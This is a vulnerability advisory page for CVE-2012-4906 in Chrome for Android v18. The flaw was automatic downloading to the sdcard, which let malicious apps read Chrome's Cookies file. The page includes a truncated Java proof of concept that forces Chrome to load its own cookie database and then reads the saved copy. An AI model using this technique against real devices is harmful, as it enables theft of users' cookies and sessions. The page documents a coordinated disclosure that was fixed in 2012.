Vulners
Lucene search
Chrome For Android Download Function Information Disclosure
🗓️ 08 Jan 2013 00:00:00Reported by Takeshi TeradaType 
packetstorm🔗 packetstormsecurity.com👁 49 Views
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | CVE-2012-4906 | 12 Sep 201200:00 | – | circl |
 | CVE-2012-4906 | 13 Sep 201220:00 | – | cve |
 | CVE-2012-4906 | 13 Sep 201220:00 | – | cvelist |
 | CVE-2012-4906 | 13 Sep 201220:00 | – | debiancve |
 | EUVD-2012-4831 | 7 Oct 202500:30 | – | euvd |
 | CVE-2012-4906 | 13 Sep 201220:55 | – | nvd |
 | Design/Logic Flaw | 13 Sep 201220:55 | – | prion |
| Design/Logic Flaw | 13 Sep 201220:55 | – | prion |
 | CVE-2012-4903 | 22 May 202505:39 | – | redhatcve |
| CVE-2012-4906 | 22 May 202502:59 | – | redhatcve |
10
`CVE Number: CVE-2012-4906
Title: Chrome for Android - Download Function Information Disclosure
Affected Software: Confirmed on Chrome for Android v18.0.1025123
Credit: Takeshi Terada
Issue Status: v18.0.1025308 was released which fixes this vulnerability
Overview:
Rogue Android apps can steal private information such as Cookie file of Chrome,
by abusing automatic download functionality of Chrome for Android.
Details:
When Chrome for Android (v18.0.1025123) loads non-renderable contents such as
binary files, Chrome for Android automatically saves them in public place (sdcard)
without asking the users whether they wish to do so or not.
Therefore, malicious Android apps can steal such contents by below method.
1. A malicious app forces Chrome to load such contents.
2. Chrome automatically save it to sdcard.
2. The malicious app read the downloaded file in sdcard.
By this method, malicious apps can gain access to both local contents such as
the Cookie file of Chrome, and possibly online contents.
Such behaivior of Chrome does not matter in PC world, but it does in Android
world, because they are different in security model.
Proof of Concept:
// This is a part of malicious Android app.
public void attack() {
try {
// let Chrome app load its Cookies file, so that Chrome app
// automatically save it to /sdcard/Download/ directory.
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
intent.setData(Uri.parse("file:///data/data/com.android.chrome/app_chrome/Default/Cookies"));
startActivity(intent);
// wait a few seconds
Thread.sleep(3000);
// read the Cookie file (/sdcard/Download/Cookies.bin)
FileInputStream fis = new FileInputStream("/sdcard/Download/Cookies.bin");
...
}
Timeline:
2012/07/07 Reported to Google security team
2012/08/25 Re-reported to Chrome security team
2012/09/12 Vender announced v18.0.1025308
2013/01/07 Disclosure of this advisory
Recommendation:
Upgrade to the latest version.
Reference:
http://googlechromereleases.blogspot.jp/2012/09/chrome-for-android-update.html
https://code.google.com/p/chromium/issues/detail?id=144820
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jan 2013 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.06965